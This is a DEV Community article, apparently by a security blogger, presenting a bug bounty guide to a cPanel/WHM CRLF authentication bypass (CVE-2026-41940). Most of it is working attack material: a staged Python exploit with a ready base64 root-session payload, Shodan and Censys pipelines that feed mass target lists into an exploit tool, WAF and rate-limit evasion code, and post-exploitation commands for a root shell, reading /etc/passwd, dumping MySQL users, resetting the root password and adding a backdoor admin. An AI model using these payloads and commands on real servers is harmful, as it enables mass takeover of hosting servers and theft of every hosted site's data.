DEV Community: Md Hehedi Hasan The latest articles on DEV Community by Md Hehedi Hasan (@securitytalent). https://dev.to/securitytalent https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1162096%2F030badce-acb7-418e-b378-d2b50cfd0981.png DEV Community: Md Hehedi Hasan https://dev.to/securitytalent en CVE-2026–41940: Bug Bounty Hunter's Guide to cPanel's CRLF Authentication Bypass Md Hehedi Hasan Sun, 03 May 2026 19:16:08 +0000 https://dev.to/securitytalent/cve-2026-41940-bug-bounty-hunters-guide-to-cpanels-crlf-authentication-bypass-1lb9 https://dev.to/securitytalent/cve-2026-41940-bug-bounty-hunters-guide-to-cpanels-crlf-authentication-bypass-1lb9 <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqsl3wx9svr69c6vgv1q.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqsl3wx9svr69c6vgv1q.webp" alt=" " width="800" height="533"></a><br> <em>A technical deep-dive for bug bounty hunters targeting CVE-2026–41940 — reconnaissance, exploitation chains, WAF bypasses, and report writing for maximum impact.</em></p> <h2> Why This Matters for Bug Bounty </h2> <p>CVE-2026–41940 is the kind of vulnerability that defines a bug bounty career. It's a <strong>CVSS 10.0</strong>, unauthenticated, remote root compromise affecting <strong>~70 million domains</strong> — and it was exploited in the wild as a zero-day for over two months before disclosure.</p> <p>For bug bounty hunters, this represents:</p> <ul> <li> <strong>Maximum severity</strong> — This is as critical as it gets. P1/Critical across every program.</li> <li> <strong>Massive attack surface</strong> — cPanel runs ~94% of the web hosting control panel market. Every shared hosting provider, every reseller, every managed WordPress host.</li> <li> <strong>Clear impact chain</strong> — Authentication bypass → root-level WHM access → full server compromise → all hosted domains owned.</li> <li> <strong>Multiple bounty opportunities</strong> — cPanel's own bug bounty, hosting provider programs, infrastructure bug bounty platforms.</li> </ul> <p>Let's break down exactly how to hunt, exploit, and report this vulnerability.</p> <h2> Understanding the Vulnerability </h2> <p>Before you hunt, you need to understand — not just run a tool.</p> <h3> The Root Cause </h3> <p>In cPanel's <code>Session.pm</code>, the <code>saveSession()</code> function calls <code>filter_sessiondata()</code> — the sanitization routine — <strong>after</strong> the session file has already been written to disk.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Normal flow: sanitize → write ✓ Vulnerable: write → sanitize ✗ </code></pre> </div> <p>This means CRLF sequences (<code>\r\n</code>) embedded in the <code>Authorization: Basic</code> header value are written verbatim into <code>/var/cpanel/sessions/raw/&lt;session&gt;</code> before any filtering occurs.</p> <h3> The Injected Payload </h3> <p>When base64-decoded, the Authorization password field contains:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>x successful_internal_auth_with_timestamp=9999999999 user=root tfa_verified=1 hasroot=1 </code></pre> </div> <p>These become newline-separated keys in the session file. When <code>cpsrvd</code> re-parses the file, it treats them as legitimate session attributes belonging to an authenticated root user.</p> <h3> The Auth Bypass Mechanism </h3> <p>cPanel's <code>docheckpass_whostmgrd()</code> checks for <code>successful_internal_auth_with_timestamp</code> <strong>before</strong> consulting <code>/etc/shadow</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight perl"><code><span class="k">if</span> <span class="p">(</span><span class="nv">$successful_external_auth_with_timestamp</span> <span class="ow">or</span> <span class="nv">$successful_internal_auth_with_timestamp</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nv">$</span><span class="nn">Cpanel::Server::</span><span class="nv">AUTH_OK</span><span class="p">,</span> <span class="mi">0</span><span class="p">;</span> <span class="c1"># Password check SKIPPED</span> <span class="p">}</span> </code></pre> </div> <p>If that timestamp exists, password validation is bypassed entirely. The attacker set it to <code>9999999999</code>. Access granted.</p> <h2> Reconnaissance — Finding Vulnerable Targets </h2> <h3> Shodan Hunting </h3> <p>The most efficient way to find targets at scale:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Broad WHM search</span> shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'title:"WHM Login"'</span> <span class="nt">--limit</span> 1000 <span class="c"># cPanel-specific on SSL port</span> shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'product:"cPanel" port:2083'</span> <span class="nt">--limit</span> 1000 <span class="c"># WHM on admin port</span> shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'title:"WebHost Manager" port:2087'</span> <span class="nt">--limit</span> 1000 <span class="c"># SSL certificate-based</span> shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'ssl.cert.subject.cn:"cPanel" port:2087'</span> <span class="nt">--limit</span> 1000 </code></pre> </div> <p>Direct pipeline to cPanelSniper:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>shodan search <span class="nt">--fields</span> ip_str,port <span class="s1">'title:"WHM Login"'</span> | <span class="se">\</span> <span class="nb">awk</span> <span class="s1">'{print "https://"$1":"$2}'</span> | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 50 <span class="nt">-o</span> shodan_results.json </code></pre> </div> <h3> Subdomain Enumeration </h3> <p>For bug bounty programs with specific scope:</p> <p><strong>Subfinder</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Subfinder → httpx → cPanelSniper</span> subfinder <span class="nt">-d</span> target.com <span class="nt">-silent</span> | <span class="se">\</span> httpx <span class="nt">-silent</span> <span class="nt">-ports</span> 2087,2086 <span class="nt">-threads</span> 50 | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 30 <span class="nt">-o</span> results.json </code></pre> </div> <p><strong>Amass</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Amass for broader coverage</span> amass enum <span class="nt">-d</span> target.com | <span class="se">\</span> httpx <span class="nt">-silent</span> <span class="nt">-ports</span> 2087,2086 <span class="nt">-threads</span> 100 | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 30 <span class="nt">-o</span> results.json </code></pre> </div> <h3> Google Dorking </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>inurl:":2087" "WHM Login" inurl:":2083" "cPanel" intitle:"WHM Login" "WebHost Manager" inurl:"/cpsess" "login_only" </code></pre> </div> <h3> Certificate Transparency Logs </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># crt.sh for domain discovery</span> curl <span class="nt">-s</span> <span class="s2">"https://crt.sh/?q=%25.target.com%25&amp;output=json"</span> | <span class="se">\</span> jq <span class="nt">-r</span> <span class="s1">'.[].name_value'</span> | <span class="se">\</span> <span class="nb">sort</span> <span class="nt">-u</span> | <span class="se">\</span> httpx <span class="nt">-silent</span> <span class="nt">-ports</span> 2087,2086 <span class="nt">-threads</span> 100 | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 30 <span class="nt">-o</span> results.json </code></pre> </div> <h3> Censys </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Censys search (requires API key)</span> censys search <span class="s1">'services.service_name: "cPanel" and services.port: 2087'</span> <span class="se">\</span> <span class="nt">--pages</span> 5 | <span class="se">\</span> jq <span class="nt">-r</span> <span class="s1">'.[] | "https://\(.ip):2087"'</span> | <span class="se">\</span> python3 cPanelSniper.py <span class="nt">-t</span> 30 <span class="nt">-o</span> censys_results.json </code></pre> </div> <h2> The Exploitation Chain — What Actually Happens </h2> <h3> Stage 0: Canonical Hostname Discovery </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">base64</span><span class="p">,</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span> <span class="k">def</span> <span class="nf">discover_hostname</span><span class="p">(</span><span class="n">target</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/openid_connect/cpanelid</span><span class="sh">"</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="c1"># Follow 307 to extract real hostname </span> <span class="k">return</span> <span class="n">resp</span><span class="p">.</span><span class="nf">getheader</span><span class="p">(</span><span class="sh">"</span><span class="s">Location</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Contains canonical hostname </span></code></pre> </div> <p><strong>Why this matters:</strong> cPanel validates the <code>Host</code> header internally. If it doesn't match the server's canonical hostname, the exploit fails silently. <strong>Always auto-discover.</strong></p> <h3> Stage 1: Mint the Preauth Session </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">mint_session</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">hostname</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="sh">"</span><span class="s">user=root&amp;pass=wrong</span><span class="sh">"</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span> <span class="n">hostname</span><span class="p">,</span> <span class="sh">"</span><span class="s">Content-Type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">application/x-www-form-urlencoded</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Content-Length</span><span class="sh">"</span><span class="p">:</span> <span class="nf">str</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">body</span><span class="p">))</span> <span class="p">}</span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/login/?login_only=1</span><span class="sh">"</span><span class="p">,</span> <span class="n">body</span><span class="p">,</span> <span class="n">headers</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="c1"># Extract session cookie </span> <span class="n">cookie</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="nf">getheader</span><span class="p">(</span><span class="sh">"</span><span class="s">Set-Cookie</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Parse: whostmgrsession=%3aSESSION_NAME%2cOB_HEX </span> <span class="n">session</span> <span class="o">=</span> <span class="n">cookie</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sh">"</span><span class="s">=</span><span class="sh">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">].</span><span class="nf">split</span><span class="p">(</span><span class="sh">"</span><span class="s">%2c</span><span class="sh">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nf">strip</span><span class="p">()</span> <span class="c1"># URL decode if needed </span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">unquote</span> <span class="k">return</span> <span class="nf">unquote</span><span class="p">(</span><span class="n">session</span><span class="p">)</span> <span class="c1"># Returns ":SESSION_NAME" </span></code></pre> </div> <p><strong>Key insight:</strong> The session name (before <code>%2C</code>) is what we need. The OB hash after <code>%2C</code> is discarded — that's what makes the injection possible in the first place.</p> <h3> Stage 2: CRLF Injection </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">inject_crlf</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">hostname</span><span class="p">,</span> <span class="n">session</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="c1"># The CRLF payload - base64 of: </span> <span class="c1"># x\r\nsuccessful_internal_auth_with_timestamp=9999999999\r\n </span> <span class="c1"># user=root\r\ntfa_verified=1\r\nhasroot=1 </span> <span class="n">payload_b64</span> <span class="o">=</span> <span class="sh">"</span><span class="s">cm9vdDp4DQoNCnN1Y2Nlc3NmdWxfaW50ZXJuYWxfYXV0aF93aXRoX3RpbWVzdGFtcD05OTk5OTk5OTk5DQp1c2VyPXJvb3QNCnRmYV92ZXJpZmllZD0xDQpoYXNyb290PTE=</span><span class="sh">"</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span> <span class="n">hostname</span><span class="p">,</span> <span class="sh">"</span><span class="s">Cookie</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Basic </span><span class="si">{</span><span class="n">payload_b64</span><span class="si">}</span><span class="sh">"</span> <span class="p">}</span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="n">location</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="nf">getheader</span><span class="p">(</span><span class="sh">"</span><span class="s">Location</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="c1"># Extract token from Location header </span> <span class="kn">import</span> <span class="n">re</span> <span class="n">token_match</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">'</span><span class="s">/cpsess(\d+)</span><span class="sh">'</span><span class="p">,</span> <span class="n">location</span><span class="p">)</span> <span class="k">if</span> <span class="n">token_match</span><span class="p">:</span> <span class="k">return</span> <span class="n">token_match</span><span class="p">.</span><span class="nf">group</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># /cpsessXXXXXX </span> <span class="k">return</span> <span class="bp">None</span> </code></pre> </div> <p><strong>Bug bounty tip:</strong> The <code>Location</code> header in the 307 response contains your session token. This is what you use in subsequent requests. Save it.</p> <h3> Stage 3: The Cache Flush (<code>do_token_denied</code> Gadget) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">flush_cache</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">hostname</span><span class="p">,</span> <span class="n">session</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span> <span class="n">hostname</span><span class="p">,</span> <span class="sh">"</span><span class="s">Cookie</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="sh">"</span> <span class="p">}</span> <span class="c1"># Request without valid token → triggers do_token_denied </span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/scripts2/listaccts</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="c1"># Expected: 401 Token Denied </span> <span class="c1"># BUT the raw session data is now flushed into JSON cache </span> <span class="k">return</span> <span class="n">resp</span><span class="p">.</span><span class="n">status</span> </code></pre> </div> <p><strong>Critical nuance:</strong> This step is often overlooked. Without the cache flush, the injected fields exist only in the raw session file. The <code>do_token_denied</code> handler calls <code>Modify::new(nocache =&gt; 1)</code> which re-parses the raw file and writes the result into the JSON cache. Only then are the injected fields active.</p> <h3> Stage 4: Verify Root Access </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">verify_root</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">hostname</span><span class="p">,</span> <span class="n">session</span><span class="p">,</span> <span class="n">token</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">client</span><span class="p">.</span><span class="nc">HTTPSConnection</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span> <span class="n">hostname</span><span class="p">,</span> <span class="sh">"</span><span class="s">Cookie</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="sh">"</span> <span class="p">}</span> <span class="n">conn</span><span class="p">.</span><span class="nf">request</span><span class="p">(</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">token</span><span class="si">}</span><span class="s">/json-api/version?api.version=1</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">getresponse</span><span class="p">()</span> <span class="n">data</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="nf">read</span><span class="p">().</span><span class="nf">decode</span><span class="p">()</span> <span class="k">if</span> <span class="n">resp</span><span class="p">.</span><span class="n">status</span> <span class="o">==</span> <span class="mi">200</span> <span class="ow">and</span> <span class="sh">'"</span><span class="s">result</span><span class="sh">"</span><span class="s">:1</span><span class="sh">'</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span> <span class="kn">import</span> <span class="n">json</span> <span class="n">version</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="nf">loads</span><span class="p">(</span><span class="n">data</span><span class="p">)[</span><span class="sh">"</span><span class="s">cpanelresult</span><span class="sh">"</span><span class="p">][</span><span class="sh">"</span><span class="s">data</span><span class="sh">"</span><span class="p">][</span><span class="sh">"</span><span class="s">version</span><span class="sh">"</span><span class="p">]</span> <span class="k">return</span> <span class="bp">True</span><span class="p">,</span> <span class="n">version</span> <span class="k">return</span> <span class="bp">False</span><span class="p">,</span> <span class="bp">None</span> </code></pre> </div> <h2> WAF Bypass Techniques </h2> <p>Bug bounty targets often have WAFs. Here's how to evade them:</p> <h3> 1. Alternative CRLF Encodings </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Instead of standard \r\n, try: </span><span class="n">payloads</span> <span class="o">=</span> <span class="p">[</span> <span class="c1"># Standard </span> <span class="sh">"</span><span class="s">cm9vdDp4DQpzdWNjZXNzZnVs...</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># URL-encoded \r\n </span> <span class="sh">"</span><span class="s">cm9vdDp4%0d%0asuccessful...</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># Double URL-encode </span> <span class="sh">"</span><span class="s">cm9vdDp4%250d%250asuccessful...</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># Unicode variation </span> <span class="sh">"</span><span class="s">cm9vdDp4</span><span class="se">\u000d\u000a</span><span class="s">successful...</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># Tab instead of CR </span> <span class="sh">"</span><span class="s">cm9vdDp4</span><span class="se">\t</span><span class="s">successful...</span><span class="sh">"</span><span class="p">,</span> <span class="p">]</span> </code></pre> </div> <h3> 2. Authorization Header Variations </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">headers_variants</span> <span class="o">=</span> <span class="p">[</span> <span class="p">{</span><span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Basic </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span><span class="p">},</span> <span class="p">{</span><span class="sh">"</span><span class="s">authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">basic </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span><span class="p">},</span> <span class="p">{</span><span class="sh">"</span><span class="s">AUTHORIZATION</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">BASIC </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span><span class="p">},</span> <span class="c1"># Split header </span> <span class="p">{</span><span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Basic</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">X-Payload</span><span class="sh">"</span><span class="p">:</span> <span class="n">payload</span><span class="p">},</span> <span class="p">]</span> </code></pre> </div> <h3> 3. Session Cookie Manipulation </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Different cookie formats </span><span class="n">cookie_variants</span> <span class="o">=</span> <span class="p">[</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="s">; path=/</span><span class="sh">"</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="s">; HttpOnly</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># URL-encoded variations </span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="nf">quote</span><span class="p">(</span><span class="n">session</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="p">]</span> </code></pre> </div> <h3> 4. HTTP Version Smuggling </h3> <ul> <li>Try <code>HTTP/1.0</code> vs <code>HTTP/1.1</code> </li> <li>Try chunked encoding</li> <li>Try <code>Connection: keep-alive</code> vs <code>close</code> </li> </ul> <h3> 5. Rate Limiting Evasion </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Add random delays </span><span class="kn">import</span> <span class="n">random</span><span class="p">,</span> <span class="n">time</span> <span class="n">time</span><span class="p">.</span><span class="nf">sleep</span><span class="p">(</span><span class="n">random</span><span class="p">.</span><span class="nf">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">2.0</span><span class="p">))</span> <span class="c1"># Rotate User-Agents </span><span class="n">user_agents</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">"</span><span class="s">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">curl/8.0.1</span><span class="sh">"</span><span class="p">,</span> <span class="p">]</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9m3xr2q0ml96paxdjrhq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9m3xr2q0ml96paxdjrhq.png" alt=" " width="800" height="721"></a></p> <h2> Post-Exploitation — What to Demo in Your Report </h2> <p>Bug bounty programs want to see <strong>impact</strong>, not just exploitation. Here's what to demonstrate:</p> <h3> 1. Account Enumeration (Proof of Access) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> list </code></pre> </div> <p><strong>Output to include in report:</strong> Number of cPanel accounts, list of hosted domains, email addresses. This proves you can enumerate all hosted tenants.</p> <h3> 2. Version Confirmation </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> version </code></pre> </div> <p><strong>Output:</strong> Exact cPanel build number. Proves the vulnerability is real and the version is unpatched.</p> <h3> 3. Server Information </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> info </code></pre> </div> <p><strong>Output:</strong> Hostname, load averages, disk usage, MySQL host. Proves you can read server-level configuration.</p> <h3> 4. Sensitive File Read (Minimum Viable Proof) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> cmd <span class="se">\</span> <span class="nt">--cmd</span> <span class="s2">"cat /etc/passwd | head -20"</span> </code></pre> </div> <p><strong>Key insight:</strong> Most programs accept reading <code>/etc/passwd</code> as sufficient proof of RCE/root access. You don't need to demonstrate destructive actions.</p> <h3> 5. Database Access Proof (High Impact) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> cmd <span class="se">\</span> <span class="nt">--cmd</span> <span class="s2">"mysql -e 'SELECT user, host FROM mysql.user' -u root"</span> </code></pre> </div> <p><strong>Impact multiplier:</strong> Proving you can access all MySQL databases on the server (every hosted website's database) significantly increases bounty potential.</p> <h2> Impact </h2> <p>An unauthenticated attacker can:</p> <ol> <li>Gain root-level WHM administrative access</li> <li>Read all server configuration files</li> <li>Access all hosted websites' files and databases</li> <li>Create persistent backdoor admin accounts</li> <li>Modify DNS, SSL certificates, and mail configuration</li> <li>Deface, redirect, or inject malware into all hosted domains</li> </ol> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk5hq49j3858blriwba8l.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk5hq49j3858blriwba8l.png" alt=" " width="335" height="334"></a></p> <h2> Basic Usage </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Single target scan</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="c"># Single target + interactive shell</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> shell <span class="c"># Bulk scan</span> python3 cPanelSniper.py <span class="nt">-l</span> targets.txt <span class="nt">-t</span> 50 <span class="nt">-o</span> results.json </code></pre> </div> <h2> Post-Exploitation Commands </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># List all accounts</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> list <span class="c"># Execute commands</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> cmd <span class="nt">--cmd</span> <span class="s2">"id"</span> <span class="c"># Interactive shell</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> shell <span class="c"># Change root password</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> passwd <span class="nt">--passwd</span> <span class="s1">'NewP@ss'</span> <span class="c"># Create backdoor admin</span> <span class="c"># (within interactive shell) addadmin backdoor_user Password123!</span> </code></pre> </div> <h2> Exploit (Manual) </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1. GET /openid_connect/cpanelid → Discover hostname 2. POST /login/?login_only=1 → Get session cookie 3. GET / + CRLF Authorization header → Inject payload 4. GET /scripts2/listaccts → Flush cache 5. GET /cpsessTOKEN/json-api/version → Verify root </code></pre> </div> <h2> References </h2> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-41940" rel="noopener noreferrer">https://nvd.nist.gov/vuln/detail/CVE-2026-41940</a></li> <li><a 